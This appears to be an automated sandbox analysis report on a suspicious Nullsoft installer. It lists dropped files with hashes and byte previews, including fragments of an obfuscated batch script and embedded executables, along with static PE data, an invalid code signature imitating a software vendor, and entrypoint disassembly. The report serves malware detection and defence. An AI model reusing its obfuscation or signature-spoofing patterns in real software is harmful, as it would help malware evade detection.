C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Advocacy

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	6.620139174841895
Encrypted:	false
SSDEEP:	768:KGE0psu0nM8+aZKINulI1+lRKw4sWGuv6crP:K90psu0nMOKzlvlao/g
MD5:	3E0A5939F55F64DC128EC03642F09392
SHA1:	74FC5265B92BF9B807E023E968F94528904918E6
SHA-256:	4B0C83524EFD0DB079ABA2519AAF676B784207AC84A7DE69918E56C698D81A91
SHA-512:	EA6EB18FB83DFB46C5461E518A33E4A2279C803931E13FD5DD9D962EB4AF35637C2011708B32F1D0457798BDAD40F59DFB35EE770AA472CAB2EF4901EDDB0082
Malicious:	false
Preview:	.......;.......jw[..>3.j.Y..}..Wc....u..fc.......f;...>e..@f;...4e.......f;...&e.....f;....e...Axf;....d..@f;....d...Azf;....d..@f;....d...Asf;...td..@f;...jd...Auf;...^d..@f;...Td...Aqf;...Hd..@f;...>d...Awf;...2d...G.=.......d.......A..$...A.3._^[..].N".........w..Pc..3.@...A.iUE..UE.6UE.[UE...A..UE...A..UE.OVE.............................................................................................................................................................\|....~...vt...}...c......t.... gJ...A..U..QQSV.u...W...}..U............c.._^[..].U..QQ...SVW..f..tvj.^......u..E.....f..u......f..ptx...;...9d..tt..U\|$..Z...d....]...c....`...c....a...c..... gJ...A..t..B..7v....f..u.3._^[..].f.A......f#.....f;.u.......A...A....A...A....U...(SV.....W.....f...M.f;.......j.Z.A.f..@..c...jpXf..n......f..o......f;.......jp...Z;..\...c....]........[...c....t9..T......... gJ..4F..t..A..7vG........f...M.j.Zf;...t..._^[..]..-......yc..HH..qc..HH..ic..HHu..`c..f.F......f#......f;.u....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Breeding

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.997675435328255
Encrypted:	true
SSDEEP:	1536:R8Rge2XmA1AAWokgUnPFc3QCLuOexdViaMtI1F+hrMdeombucP:WSe211AjpnPFdC6p7VDfbQX
MD5:	3EC78865D37DBA4270B52656BFCD5D51
SHA1:	761877D874E583014BFE9C5F0D5BA71BA4F788A6
SHA-256:	7C8734F0A4571438A469037571F7AD8A7513E779FD65F3D547D1426BAD7B2034
SHA-512:	CB7CAFAA16C342F9D5E4A3C9BCEBE32B1B2106AD811132BE75A4C9F9222FEA9DDC5BA5FB0C9CEF6626C01E81215F550C060E4300E9D64D83065E806B783E80C5
Malicious:	false
Preview:	..(...N.1..,...\ab......mC.C....FZq...@..5.C'...?.....I...;.F../>+h..y".d~...F>M.....Zp..N....B....]!6..8H..KzSW.#Pf.M....++ws...}]d.k....P.Up..R.....D.fG..d...wE....... .T..i.0$a.".$..\.$.-..z..+.._...;.".....i?./.. D.u..r.....>.+....c.(L.E..R.KI/..(.T...3......=z..."...I.M!.;....3 ..B.../z.5.......M't~.4.....gnl.:~.p^.4...f(c=.....}..!.7x..S8.KY..P....j.....z...3.N.V..E.p...5..'....L.....Tl...X.c..i5.%.........^...Hk....6./..<.`b......0...".w]S..i..F..,.3.^l../~A.....t:+X..5z.j..H.jU.......#.<.5....h.....FM....L.Z..L.ikG.h..`.E..x...:=.^2...6...lH...[ .U...S.ss;s...h....8G.....YG....g.-W)$9...b........q."...?...Qw...!.o...n...O....^Ce..FE.P...7.G...............0.F....nR......6.X....>..OW.+.......u9.....lnp..*y..L.....B..D]..Fy...I.D.f...`..N.l^].{J U:....\.)..7.Aw.a......4wZ..V...d.WMZ...u..+.K.wCr.].._...]i...p....xO.....ELth...R.#.>..F.>.!..)..B...j.e@...3.d.NCM..7.2.........>.._....:.~....O..m...m......5.n.n..,0k....o.>E4$..3..0t1.J..H.HK.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cyprus

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	4.771218508877588
Encrypted:	false
SSDEEP:	3:fQRLsXYRLLyiWUqt/vllpfrYZcFTS9gXeF+X32ZpAo3P8GmbgElKmE/p3PeU+:fQRL7R/hqjvVg3F+X32l/8xb99E/p/L+
MD5:	E5ECF7084F37757A977CB7854FAF0DD2
SHA1:	6778EA5AC5ECC59171883C2AA7204373F46C5FB1
SHA-256:	10D22D0F44BCDF23A31D0097069E1D095A86E2113580BFC61F50B7AC3218A4D2
SHA-512:	7F4EEF0637C68154BE4341C02DA291E8B81E64ECD7ED5CBA5D30A2E1A2E63839C1682FDADE36A9DA06124321AEC610EFAF23B4B5FCDD1BF4C6BE104E7C0D9CEB
Malicious:	false
Preview:	SlutSteLouisTranslation..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Folk

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	123904
Entropy (8bit):	6.342819068764455
Encrypted:	false
SSDEEP:	1536:TCV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNpRGDox2S3hPt8gNpkU5uG3xYwBMN:TCV26MqgQTc5F446iYNpK5SB7BJBzS
MD5:	00425DB818E6FD2F0EEB0CF37469B749
SHA1:	D9BD6E0AFCA273AA8A931360C2F91C0D9D1463A1
SHA-256:	DA879D5EB37E5C0EF62422B95ADB8AA39607BB6C6D1EFA817CB8353633B8D0EB
SHA-512:	9B8D7AA19308B7376B4933E09613BAC281D0AB332BCE661B7E590F6568519C66A6D307883B3274E6668AD61B4EE52E519D8A574F6202AD827B9F0A2AA8366721
Malicious:	false
Preview:	j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fuji

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.997175895163403
Encrypted:	true
SSDEEP:	1536:0rAGBBNImxCyakScpiByZYeNEHTeUOuNUBO0YgHXH6M1Sgqjw5:0rAGr/PxSc0eH6HTeUOuec0Yg3apK
MD5:	901F468EEDA506282D7906687C36EF22
SHA1:	0FB000FA798D648C1309CC6599692ED6AC4D4990
SHA-256:	2F64E2C562E065AE15A95BE85D128E6F99F6D201B3B18A8CF5DBB1AB8CB87D62
SHA-512:	17B4768CE6075EA83B774CF37BC2C2F2B7F6B78156C883CB6FA38422513FD8E19E03556A5BAF549E31B4F02DE78638A3F480421440F4E38EA32E8CD014CEE0E0
Malicious:	false
Preview:	.Q..]......'8s...d.z.-..md;.i...#...3..6%.m.R..}..'..M.....0......\|t)...Gn..f.M....m..%....@..k..K...u..X....=[nt.....c...X.$.R..E7.I.OCh8.HN&..Og...7...!..y....C....5.Y4.Y....j7S...O .I/N..2X..y..6.QC.7YN.A....1..p..T..HX........PMC[d.;.{=.. &..c9.a..k.}.et.t]...Au.IKj....bSUg..."...Nq.!8.^.ga.....4`.....:..."oZ.g........u^..{.M.(..Eh[uM...G..&.....YK..........B.B......_...JG......n.-.-.B1`d.Yr..sr.)N...(..\|..Z.eb". Vnj..f.Y@...@...Xg..Hu]...^8..~X..f.J...H......B.e.Q......r.~.e.hW....-...b.?...RONyx...Eu=...-....v.&P2s.I..c...H&......DT..?...-..a\sh....!.`..e..r.Klw.......%.\W.m.~Yk.S.q.`DZ.G..H^..:.ta.v.=.].......t....(K..H......'=.o..?...9.:..<d.!U......[.).Zs\4..,y5......K.....g......m......FuFN..G...uZy..V.........\|..O)....k.0*C..(....wC1.q... ..#..'..J.P(.).T.6\|..8x.R..P`oh...F........t..M....b...7......K..0%a...>.......P34.mW?.\.j.A..b..G..Q]..lq..[5.....}.(BD....Z..=S.<.....T....}..5.;w.I......G.)V..i!.z.#.)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Mind

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	6.762258860090385
Encrypted:	false
SSDEEP:	1536:0Is2ziQD2tR/i0027EM/awuUwU7KxQefixl2vqWWGlHHvpKa5Gk6/vij4O:0Is8di/37EM/j2xQeixApVIa0/viH
MD5:	83AEEA636C54D733CC32AB493A5364D4
SHA1:	545C1357944C51E9F8D2110D01DFA2076A716613
SHA-256:	0D5602BA1E91C3672992926D40ADE260DB5DF228AF923DF30C5BF4242DF2F133
SHA-512:	F61ACFB0B7ACE3331945DD1B623FED445B8E2641380861708D1146CA595BB921B81025F9E39AA8C94F7FEF20635F009FD8BD4697227F61ED7B5DEE56466B616A
Malicious:	false
Preview:	SV.u.3.W........tf=..L.t_.Fx..tX9.uT........t.9.u.P.............YY.F\|..t.9.u.P.v.............YY.vx.a..........V...YY........tD9.u@......-....P.5..............+.P.".........+.P.........................=..L.t.9.....u.P.q..............YYj.X.......E..~......L.t.....t..8.u.P....3...YY.E.....t..G...t..8.u.P...Y.E.......H.E.u.V.{...Y_^[].U..U.........SV...W.......Jx..t...............t........J\|..t...............t.......j..J.[.y...L.t..9..t........y..t..y...t..........Ku...............1N_^[..].j.hX.K..t....e.............L..Npt".~l.t.......pl..u.j .....Y.......j..@...Y.e...54.L..FlP.!...YY...u..E...........u.j..w...Y.U..W.}...t;.E...t4V.0;.t(W.8.....Y..t.V.....>.Yu...8.L.t.V.F...Y..^..3._].=TrL..u.j..M...Y..TrL.....3..U..E.-....t&...t....t.Ht.3.].0?I.].,?I.].(?I.].$?I.].U.....M.j......%$RL...E....u...$RL.........I..,...u...$RL.........I......u..E...$RL......@..}..t..M..ap...].U..S.].VWh....3..s.WV....{.3..{................{.......L.+...7..FIu..............9..AJu._^[].U

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Orders

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	226799
Entropy (8bit):	5.82856661945802
Encrypted:	false
SSDEEP:	3072:XaAt7P+6i/xhgariwYLTNaWy4ZNoBVxjCPjojv:XdFW6wgarnYNhBZ2BV8jojv
MD5:	634D131AEF5FB9666CDCAF3C8C2C4260
SHA1:	87200BE917FF801478DEA404EF60980C45D05CDE
SHA-256:	4536F5904C52E8E2B0B7AA3C5CF2527FE09DAD507A40335473D4386EEF02E0D7
SHA-512:	AA87118CD7CF36B567D58B0DB75BF3E2058C8E3F7ACE69E8BE0E7F79E10AD316101BBDD3FACAF9E725B75E4B755B8F674C1070A51DA4DBC0720F4D1DE1DBD3C0
Malicious:	false
Preview:	.......!.......!.......!...8...!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!...~...!...+..!...]...!...(..!...?..!...=...!...E...!...G...!......!......!......!.......!...2...!...3...!...6...!...5...!...O...!...K...!...1...!...(...!...D...!.../...!...-...!....)..!...A...!....)..!...+...!......!....)..!...&...!......!.......!...'...!.......!...%...!.......!...................................t.......................................................t.......&.......%.......@.......?............... ......" ......; ......& ....... ......3 ....... ....../ ......7 ....... ......+ ......C ..............................".......;.......&...............3.............../.......7.......................+.......C...............................".......&...............+......./...............................3.......7.......................&.......;........................~.......P....... ....................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Origins

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	ASCII text, with very long lines (1249), with CRLF line terminators
Category:	dropped
Size (bytes):	24402
Entropy (8bit):	5.038955160795066
Encrypted:	false
SSDEEP:	384:euFFnJ3Qk/9p5unBL9kgyEGQYeE5b712pSnSLEf1qjWfEPE3BZbYDv70:Hp3Qc9W9kgyEGneE17MuSLwfEPE37YD4
MD5:	14DBB5FCFE93369164F6423EF2A9A618
SHA1:	C5D414A05EECFD9BA26EDE311DBE0C6ADDC62F79
SHA-256:	6CB0F1E1D71431257F46DB15167CD8BF22313E6AB3425BAD00C64EA918F213A5
SHA-512:	28E64E8D41DA778CD1BA5C29667FD54F3CA5AF276D87F8AA3D14EC77A1C15E04F5A58D7C0E5DF8807D2C5381960F3FC25394F949365D09EBF8455A63470F2E8E
Malicious:	false
Preview:	Set Belfast=p..TxfHope Falling Cottage Sunset Sensor Libraries Conversations Exotic ..PXMAWhile Signs Pic Ads Handles Cache Energy Minnesota ..AhfAdventure Tied Oxygen Recognition His Automation Drugs Trek Rm ..eTzConsider Enough Biological Arrived Para Guardian ..yrVSCommitted Left Stuart Rx Pump Occasional Ld Llp Computing ..irBDe Suggestions Costs Jennifer Numeric Change Alternative ..yhbNy Therapist Abandoned Token Soundtrack ..TvUOWould ..vaSRuns Citations Americas Listed ..ouUEPushing Vocal Pest ..Set Hacker=M..hqLiving Duo Myers Hopkins Confirmed Booth ..bPkSScholarships Commissions ..syTube Parents Reasonable Switches ..jcIowa Database ..nJaRes Extraordinary Capacity Compound ..RcpKPolicies Relaxation Carrier ..OCrmFavor Forum Taylor Pattern Donors Fioricet Affecting Anatomy Pairs ..tsCRefresh Anaheim Stockholm Welding Celebrities ..Set Frequency=W..bwCLan Documents Dash ..JfZOBacteria ..JSRLRwanda Painting Ob Yr Cake Diamond Guidelines Testimonials ..DWufTony Stylus Blanket Up

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Origins.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1249), with CRLF line terminators
Category:	dropped
Size (bytes):	24402
Entropy (8bit):	5.038955160795066
Encrypted:	false
SSDEEP:	384:euFFnJ3Qk/9p5unBL9kgyEGQYeE5b712pSnSLEf1qjWfEPE3BZbYDv70:Hp3Qc9W9kgyEGneE17MuSLwfEPE37YD4
MD5:	14DBB5FCFE93369164F6423EF2A9A618
SHA1:	C5D414A05EECFD9BA26EDE311DBE0C6ADDC62F79
SHA-256:	6CB0F1E1D71431257F46DB15167CD8BF22313E6AB3425BAD00C64EA918F213A5
SHA-512:	28E64E8D41DA778CD1BA5C29667FD54F3CA5AF276D87F8AA3D14EC77A1C15E04F5A58D7C0E5DF8807D2C5381960F3FC25394F949365D09EBF8455A63470F2E8E
Malicious:	false
Preview:	Set Belfast=p..TxfHope Falling Cottage Sunset Sensor Libraries Conversations Exotic ..PXMAWhile Signs Pic Ads Handles Cache Energy Minnesota ..AhfAdventure Tied Oxygen Recognition His Automation Drugs Trek Rm ..eTzConsider Enough Biological Arrived Para Guardian ..yrVSCommitted Left Stuart Rx Pump Occasional Ld Llp Computing ..irBDe Suggestions Costs Jennifer Numeric Change Alternative ..yhbNy Therapist Abandoned Token Soundtrack ..TvUOWould ..vaSRuns Citations Americas Listed ..ouUEPushing Vocal Pest ..Set Hacker=M..hqLiving Duo Myers Hopkins Confirmed Booth ..bPkSScholarships Commissions ..syTube Parents Reasonable Switches ..jcIowa Database ..nJaRes Extraordinary Capacity Compound ..RcpKPolicies Relaxation Carrier ..OCrmFavor Forum Taylor Pattern Donors Fioricet Affecting Anatomy Pairs ..tsCRefresh Anaheim Stockholm Welding Celebrities ..Set Frequency=W..bwCLan Documents Dash ..JfZOBacteria ..JSRLRwanda Painting Ob Yr Cake Diamond Guidelines Testimonials ..DWufTony Stylus Blanket Up

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Titten

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	6.638811504058874
Encrypted:	false
SSDEEP:	1536:Wg/Pp5q/qw0j8sgyZpQ4VMEPmfP/b/psgrO4aK9iwcznrQfy0c4cDTOelOFCOBSH:9XqGjLPQ6ClAMfA4lelIJBSLPNV
MD5:	237D2F88A43C21C9BC5599BE91B3571B
SHA1:	E94251DD329300F7C74631CDAAFD5F504C4866FA
SHA-256:	698E3ABA58EDB38FB5C26CB561C65811636A18F8DD28EDBE2CF9FCBA87DF229C
SHA-512:	79249B8A15E807C2AF0423D2FB5615D96E95EE1A7E4E6E10FA196838194C1EE16F11C41D5580C9D40A693937FECF392E1C607439E3012BB035A99FA7A1334213
Malicious:	false
Preview:	.D..C.....0....t..J.j..U..N....E.....s..R..........s........s..3.8.....s.....@..s............I..E.P..B...E....s..3..{s...N..y0..t.Q..X...~..F...s..Q.....E......es..........es...$.2.D..u....Ss..V..\.I..u..~.u....<s...N..h.u....,s..Q....(....s...E..p.........u..C.u.....s..Q...`....r...u.....r..Q...`....r...u.....r........V.F.......r....D...D...D...@...@...D...@...D...D...D.b.D.A.@.A.@.A.D.A.@.U.D.w.D...D...D...D...D.).D.C.D.\|.@...D.\|.@.\|.@.k.D.\|.@.).D.n.D...D...D...D...D.m.@...D...D.u.D...D.0.D.Y.D...D.Y.D.Y.D...D.Y.D.I.D.;.D.V.D.^.D...D...D...D.V.D...D.m.D.z.D...D...@...D...D.4.D.4.D...@.4.D...D...D...D...D..@..@.\|.D..@...D...D...D...D...D...D..G..M..@...@.Ph.........C....u..M..E.j.P.E.PW..Q......_u... ...u$.M..E.j.P.E.PW.........=u...]..M..]..G....f.x.Nt..r...8....u..j..E.AP.E..M..M.PW.7.......t...E...u..E...P.+6...s.....uj.M.j..M..............)...........~yj..%....~nj.j..u...%.......t[j.j..u...%.......P..5...E.P.M..5....s.....uk.M..A..x..~"j.j......P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Towards

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.669438607849053
Encrypted:	false
SSDEEP:	6144:+VPlcBgtoTqnvAfcaG9b2M8JTDD/xcq21R1p/rAOPOei7j:YlcqikvAfcN9b2MyZa31troPj
MD5:	9747E2F0863C6ACEE2CAD8E96980658A
SHA1:	3DA9CFB884A513A5ECD9138D09287055A423D110
SHA-256:	6F47415606C5B750D66C7340F65A3FECAFE28B2E7A83DADC3DC154D72B727FFF
SHA-512:	A48ACF816E1D607925A549B904A52665C5AAAB37A3A9F198183E78C7EBFF22806C1D74B934B01298DA82B5701D553D1DA4EBF1862099ED0091CEDFE0571BB744
Malicious:	false
Preview:	..8.M.V.BY...M..:Y...u..~........h..K..6.Gx..YY........h..K..6.1x..YY..u.h..K.....j.h..K..6.........u.h.K...j.h.K..6.........u.h..K..M...^..j.j..&j.h..K..6........uDh(.K..M..^..j.j..E..P...P.M...c...M..$c...E.P.c....E.P.M..9^...&h8.K..6.xw..YY..u,h@.K...h..K..M..R^..hL.K..M..$_...E..P.b...M...b...M..b..^..]...U.....M.SW..W..3.j;..[.M.W..[..3.f9..M.t,W..[..f9.u.S.M...Z...M.W..[...M....P..Z..G...E.P.?b...M..Qb.._[..]...U..M.].....U..........SV..W3....\|$..C.@t.GF.t$..C..t/h.....D$$P.u...H.I..D$ P.......\|..YY..u.GF.t$..C........h.....D$$P.u...l.I..{..u..D$ P.,s..YP.D$$P..\|.I..C..\|$.Ht,Ht.Hu>.s..D$$P.R\|..YY.(.s..D$$P.o...YY..t....s..D$$P.s..?}.......u.G.C..u,h.....D$$P.u...H.I..D$ Ph..K...{..YY..u..\|$.F.t$..C..t{h.....D$$P.u...l.I..D$ P.L$..}^...D$.P.K4.$V...L$...`...K4.?....t/.C..u(h.....D$$P.u...H.I..D$ Ph..K..y{..YY..t.G.t$.F.t$..C..tIh.....D$$P.u...H.I..D$ P.L$...]...D$.P.Kl.U...L$..f`...Kl..?....t.G.t$.F.C..t.;.u..u..........t.GF.K.......tk.D$.P.u.....I..K...y..D$.9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Weather

Download File

Process:	C:\Users\user\Desktop\lSmb6nDsrC.exe
File Type:	data
Category:	dropped
Size (bytes):	110190
Entropy (8bit):	7.998515691364792
Encrypted:	true
SSDEEP:	3072:BbqImoZ2Xq13nYOeI9SjFlWkHtI+m+xH0kXnb85y:pqIbX13nYOh+dtIyV0krz
MD5:	C7980F56319F536020F8BEF4BB8974C0
SHA1:	ADB8ADF76B9ADD121CEFBCE1C58CA5510D21F671
SHA-256:	9E5BDBE0A3F24B4700E379F38FE40928EBFE69FC2FB2E9D2FD942B6CF7991545
SHA-512:	CB37715791F3E3D8C4BD30CCC8E3E8E84F4A8720467F80E742D70AA6E9755F1ECEC9DB8CF55D4D8F8572DCE818F55FF7C3771BBACD6FA597C4DB04AE56389E70
Malicious:	false
Preview:	..V.1TF.....deIR..o...~.R5.I5p\|......V+.qr..m_.3..^.djy/..w>....3.j...=.E......>..,.#....P..+.K%n!H,...:~.N...4.i.g....".sm...!......T.O...;..4.w.?.-a[s..i.....x..E7".r..~.(.K.BW...H\.Z7J...../.7..{..L....{....)....`.j.j...)..XQ.zj.c...I].3...T.....:...%..n.R.^h.hm.u..>....[._92.]..tuO...T....z....B[..AA....I.N......yA.M....ds.'l.....8D.K..U6....V.J........!.yx6....w.)...q....E.. ........._.`..>......lQ.k.y4.....A.=..Q\2_[K..U{..(:.M...m9.k~.[..GYN..!...^...),.}...[0...r...}..Se......!~..RRz.f...#Z~_c.t.}eB...x'..#..uv{a..$.....w.gMz.8.\.......fXh...!\|~f..../'...0.-...c..5.R.H.b..w.3D!.f.T..........2H.L...p...-mjY.X...B6;Ew...-.g....i.a.....0}M5.....b.oI..h#H,......XM..a.....W...W".%...qXx...@.........+......W..-.Es.#...a."..^..Y.]..........X..Rb.[..,....;. S.81l...&..@...s..c.7...O....+.......9..mP.........#....j..-.?...g.).....*\.j.....q.ta..#..R........[..=....b...S.C.@[.9........W.=..B+.j.P....._t..b.dK..%Gv.5o26..".~...MF...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.978647228575858
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lSmb6nDsrC.exe
File size:	709'936 bytes
MD5:	83741bbca9631aa4925203fbddc0ad7d
SHA1:	f636ef4f3279cd49d1036a70293f8390ecc96a3e
SHA256:	538af0e39f24f16e4e52cad03295a359304d8f458c1fe18d0681e884112f2185
SHA512:	55ee1b215e46024c3bb3722518d476be148c3c48d60d744c53fecba48b7a02ba9ab2f58b436b9657e4748d72d6696bc5e6f477f7805f91fa66841debd00b9a5b
SSDEEP:	12288:tXBffJMAUAyQAg8Y3ElBvCm5KUwzq2uE2na367joJqTOX7gXX7:tXBfmPQXMqm5wzq2uDa367joJqaXQ7
TLSH:	61E423841E40D66BE7628D355DB0D637C7FDEA1496BC02870B689F2CE874BD2AE0531B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....

File Icon


Icon Hash:	0cf4e0c0eefcf870

Static PE Info

General

Entrypoint:	0x4034fc
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/08/2023 10:26:26 08/11/2026 13:04:55
Subject Chain	E=support@aimp.ru, CN=IP Izmaylov Artem Andreevich, O=IP Izmaylov Artem Andreevich, L=Tula, S=Tula Oblast, C=RU
Version:	3
Thumbprint MD5:	6D19725F7816780EA2486A64C132A93F
Thumbprint SHA-1:	1E18B76E7832F103B16AE8AED5A5DCD16345CEF8
Thumbprint SHA-256:	FE00B31A9784D9243385599AEA8382EB420939EA7515813C4C4151AC35C9DFE2
Serial:	09599DA198AB73B39CE6638B

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007FA3A4DC43EAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007FA3A4DC43B8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3a000	0x1890	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xab050	0x24e0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6556	0x6600	dd25e171f2e0fe45f2800cc9e162537d	False	0.6652113970588235	data	6.456753840355455	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb38	0x600	2bc02714ee74ba781d92e94eeaccb080	False	0.501953125	data	4.040639308682379	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3a000	0x1890	0x1a00	90098fb966fdc51dab41eb591afbc3af	False	0.5543870192307693	data	5.154852653297943	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3a190	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.6213570127504554
RT_DIALOG	0x3b2b8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3b3b8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3b4d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3b538	0x14	data	English	United States	1.05
RT_MANIFEST	0x3b550	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
